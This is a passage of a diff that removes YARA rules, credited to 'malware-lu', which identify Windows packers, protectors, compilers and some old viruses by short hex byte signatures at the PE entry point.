-		$a0 = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DevC4992BloodshedSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 ?? ?? ?? 00 E8 C8 FE FF FF 90 8D B4 26 00 00 00 00 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 ?? ?? ?? 00 E8 A8 FE FF FF 90 8D B4 26 00 00 00 00 55 8B 0D ?? ?? ?? 00 89 E5 5D FF E1 8D 74 26 00 55 8B 0D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV119DllLZMA430ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 7C 24 08 01 0F 85 C7 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 49 0B 00 00 EB 0C 8B 85 45 0B 00 00 89 85 49 0B 00 00 8D B5 6D 0B 00 00 8D 9D 2F 03 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 DA 0A 00 00 89 85 41 0B 00 00 E8 76 01 00 00 EB 20 60 8B 85 49 0B 00 00 FF B5 41 0B 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 C7 08 83 3C 37 00 75 DA 83 BD 55 0B 00 00 00 74 0E 83 BD 59 0B 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 DA 0A 00 00 89 85 69 0B 00 00 5B 60 FF B5 41 0B 00 00 56 FF B5 69 0B 00 00 FF D3 61 8B B5 69 0B 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 E9 98 00 00 00 56 FF 95 D2 0A 00 00 89 85 61 0B 00 00 85 C0 0F 84 C8 00 00 00 8B C6 EB 5F 8B 85 65 0B 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 65 0B 00 00 C7 00 20 20 20 00 EB 06 FF B5 65 0B 00 00 FF B5 61 0B 00 00 FF 95 D6 0A 00 00 85 C0 0F 84 87 00 00 00 89 07 83 C7 04 8B 85 65 0B 00 00 EB 01 40 80 38 00 75 FA 40 89 85 65 0B 00 00 66 81 78 02 00 80 74 A1 80 38 00 75 9C EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 80 3E 01 0F 85 5F FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 69 0B 00 00 FF 95 DE 0A 00 00 68 00 40 00 00 68 00 20 0C 00 FF B5 41 0B 00 00 FF 95 DE 0A 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule XJXPALLiNSoN
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? 40 00 68 ?? ?? 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 44 53 56 57 66 9C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov220b1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 30 12 41 00 68 A4 A5 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptor20Vaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 ?? ?? ?? ?? F7 D1 83 F1 FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SentinelSuperProAutomaticProtectionv641Safenet
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { A1 ?? ?? ?? ?? 55 8B ?? ?? ?? 85 C0 74 ?? 85 ED 75 ?? A1 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 55 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 15 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 6A 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 01 00 00 00 5D C2 0C 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule TMTPascalv040
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0E 1F 06 8C 06 ?? ?? 26 A1 ?? ?? A3 ?? ?? 8E C0 66 33 FF 66 33 C9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02CrunchPEHeuristicAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 E8 0E 00 00 00 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeMSVCDLLMethod4emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 56 57 BF 01 00 00 00 8B 75 0C 85 F6 5F 5E 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VcAsmProtectorV10XVcAsm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VBOXv42MTE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8C E0 0B C5 8C E0 0B C4 03 C5 74 00 74 00 8B C5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeUPX0896102105124emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtBorlandDelphiMicrosoftVisualC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }
-	$a1 = { C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule VxHafen809
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 1C ?? 81 EE ?? ?? 50 1E 06 8C C8 8E D8 06 33 C0 8E C0 26 ?? ?? ?? 07 3D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackFullEdition117LZMAAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 73 26 00 00 8D 9D 58 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01LTC13Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ACProtectv141
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 76 03 77 01 7B 74 03 75 01 78 47 87 EE E8 01 00 00 00 76 83 C4 04 85 EE EB 01 7F 85 F2 EB 01 79 0F 86 01 00 00 00 FC EB 01 78 79 02 87 F2 61 51 8F 05 19 38 01 01 60 EB 01 E9 E9 01 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yodasProtectorV1031AshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 74 72 42 00 8B D5 81 C2 C3 72 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3F A9 42 00 81 E9 6E 73 42 00 8B D5 81 C2 6E 73 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 98 2E 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElock096tE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 59 E4 FF FF 00 00 00 00 00 00 00 ?? ?? ?? ?? EE ?? ?? 00 00 00 00 00 00 00 00 00 0E ?? ?? 00 FE ?? ?? 00 F6 ?? ?? 00 00 00 00 00 00 00 00 00 1B ?? ?? 00 06 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 ?? ?? 00 00 00 00 00 39 ?? ?? 00 00 00 00 00 26 ?? ?? 00 00 00 00 00 39 ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WerusCrypter10byKas
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB E8 12 40 00 80 33 05 E9 7D FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HEALTHv51byMuslimMPolyak
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E E8 ?? ?? 2E 8C 06 ?? ?? 2E 89 3E ?? ?? 8B D7 B8 ?? ?? CD 21 8B D8 0E 1F E8 ?? ?? 06 57 A1 ?? ?? 26 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCGuardv303dv305d
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 50 E8 ?? ?? ?? ?? 5D EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxNovember17768
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? 50 33 C0 8E D8 80 3E ?? ?? ?? 0E 1F ?? ?? FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BeRoTinyPascalBeRo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? ?? ?? 20 43 6F 6D 70 69 6C 65 64 20 62 79 3A 20 42 65 52 6F 54 69 6E 79 50 61 73 63 61 6C 20 2D 20 28 43 29 20 43 6F 70 79 72 69 67 68 74 20 32 30 30 36 2C 20 42 65 6E 6A 61 6D 69 6E 20 27 42 65 52 6F 27 20 52 6F 73 73 65 61 75 78 20 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PrivateexeProtector21522XSetiSoftTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule Protectorv1111DDeMPEEnginev09DDeMCIv092
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 51 56 E8 00 00 00 00 5B 81 EB 08 10 00 00 8D B3 34 10 00 00 B9 F3 03 00 00 BA 63 17 2A EE 31 16 83 C6 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01XCR011Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 8B F0 33 DB 83 C3 01 83 C0 01 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Trivial173bySMTSMF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB ?? ?? 28 54 72 69 76 69 61 6C 31 37 33 20 62 79 20 53 4D 54 2F 53 4D 46 29 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv11MTE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WARNINGTROJANRobinPE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PiCryptor10byScofield
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 EC 53 56 57 31 C0 89 45 EC B8 40 1E 06 00 E8 48 FA FF FF 33 C0 55 68 36 1F 06 00 64 FF 30 64 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 31 C0 E8 4E F4 FF FF 8B 45 EC E8 F6 F7 FF FF 50 E8 CC FA FF FF 8B D8 83 FB FF 74 4E 6A 00 53 E8 CD FA FF FF 8B F8 81 EF AC 26 00 00 6A 00 6A 00 68 AC 26 00 00 53 E8 DE FA FF FF 89 F8 E8 E3 F1 FF FF 89 C6 6A 00 68 28 31 06 00 57 56 53 E8 AE FA FF FF 53 E8 80 FA FF FF 89 FA 81 EA 72 01 00 00 8B C6 E8 55 FE FF FF 89 C6 89 F0 09 C0 74 05 E8 A8 FB FF FF 31 C0 }
-	$a1 = { 55 8B EC 83 C4 EC 53 56 57 31 C0 89 45 EC B8 40 1E 06 00 E8 48 FA FF FF 33 C0 55 68 36 1F 06 00 64 FF 30 64 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 31 C0 E8 4E F4 FF FF 8B 45 EC E8 F6 F7 FF FF 50 E8 CC FA FF FF 8B D8 83 FB FF 74 4E 6A 00 53 E8 CD FA FF FF 8B F8 81 EF AC 26 00 00 6A 00 6A 00 68 AC 26 00 00 53 E8 DE FA FF FF 89 F8 E8 E3 F1 FF FF 89 C6 6A 00 68 28 31 06 00 57 56 53 E8 AE FA FF FF 53 E8 80 FA FF FF 89 FA 81 EA 72 01 00 00 8B C6 E8 55 FE FF FF 89 C6 89 F0 09 C0 74 05 E8 A8 FB FF FF 31 C0 5A 59 59 64 89 10 68 3D 1F 06 00 8D 45 EC E8 C3 F6 FF FF C3 }
-	$a2 = { 89 55 F8 BB 01 00 00 00 8A 04 1F 24 0F 8B 55 FC 8A 14 32 80 E2 0F 32 C2 8A 14 1F 80 E2 F0 02 D0 88 14 1F 46 8D 45 F4 8B 55 FC E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 3B F0 7E 05 BE 01 00 00 00 43 FF 4D F8 75 C2 ?? ?? ?? ?? 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? C3 E9 }
-
-condition:
-		$a0 or $a1 at pe.entry_point or $a2
-}
-	
-	
-rule PseudoSigner02MacromediaFlashProjector60Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeWWPack321xemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32 20 64 65 63 6F 6D 70 72 65 73 73 69 6F 6E 20 72 6F 75 74 69 6E 65 20 76 65 72 73 69 6F 6E 20 31 2E 31 32 0D 0A 28 63 29 20 31 39 39 38 20 50 69 6F 74 72 20 57 61 72 65 7A 61 6B 20 61 6E 64 20 52 61 66 61 6C 20 57 69 65 72 7A 62 69 63 6B 69 0D 0A 0D 0A 5D 5B 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEArmor07600765hying
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 00 08 00 00 00 00 00 00 00 60 E8 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule PECryptv102
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ILUCRYPTv4015exe
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B EC FA C7 46 F7 ?? ?? 42 81 FA ?? ?? 75 F9 FF 66 F7 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NJoy13NEX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 B8 48 36 40 00 E8 54 EE FF FF 6A 00 68 D8 2B 40 00 6A 0A 6A 00 E8 2C EF FF FF E8 23 E7 FF FF 8D 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VBOXv43v46
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 }
-	$a1 = { 90 03 C4 33 C4 33 C5 2B C5 33 C5 8B C5 ?? ?? 2B C5 48 ?? ?? 0B C0 86 E0 8C E0 ?? ?? 8C E0 86 E0 03 C4 40 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule CodeLockvxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CipherWallSelfExtratorDecryptorGUIv15
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 F9 89 C7 6A 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ARMProtectorv01bySMoKE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 01 00 8D 8D 92 31 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 }
-
-condition:
-		$a0
-}
-	
-	
-rule Upackv037betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 37 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
-	$a1 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 37 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? ?? 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 D2 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B 7E 34 0F 82 8E FE FF FF 58 5F 59 E3 1B 8A 07 47 04 18 3C 02 73 F7 8B 07 3C ?? 75 F1 B0 00 0F C8 03 46 38 2B C7 AB E2 E5 5E 5D 59 51 59 46 AD 85 C0 74 1F }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PrivateExeProtector1xsetisoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? B9 ?? 90 01 ?? BE ?? 10 40 ?? 68 50 91 41 ?? 68 01 ?? ?? ?? C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petitev14
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NullsoftInstallSystemv20a0
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 0C 53 56 57 FF 15 B4 10 40 00 05 E8 03 00 00 BE E0 E3 41 00 89 44 24 10 B3 20 FF 15 28 10 40 00 68 00 04 00 00 FF 15 14 11 40 00 50 56 FF 15 10 11 40 00 80 3D E0 E3 41 00 22 75 08 80 C3 02 BE E1 E3 41 00 8A 06 8B 3D 14 12 40 00 84 C0 74 19 3A C3 74 }
-
-condition:
-		$a0
-}
-	
-	
-rule Obsidium1332ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule modifiedHACKSTOPv111f
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 52 B4 30 CD 21 52 FA ?? FB 3D ?? ?? EB ?? CD 20 0E 1F B4 09 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxKuku886
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 06 1E 50 8C C8 8E D8 BA 70 03 B8 24 25 CD 21 ?? ?? ?? ?? ?? 90 B4 2F CD 21 53 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxCIHVersion12TTITWIN95CIH
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8D ?? ?? ?? 33 DB 64 87 03 E8 ?? ?? ?? ?? 5B 8D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ShegerdDongleV478MSCo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 32 00 00 00 B8 ?? ?? ?? ?? 8B 18 C1 CB 05 89 DA 36 8B 4C 24 0C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SDProtectRandyLi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SmokesCryptv12
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEncryptv31
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? ?? 00 F0 0F C6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEncryptv30
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5D 81 ED 05 10 40 00 8D B5 24 10 40 00 8B FE B9 0F 00 00 00 BB ?? ?? ?? ?? AD 33 C3 E2 FA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
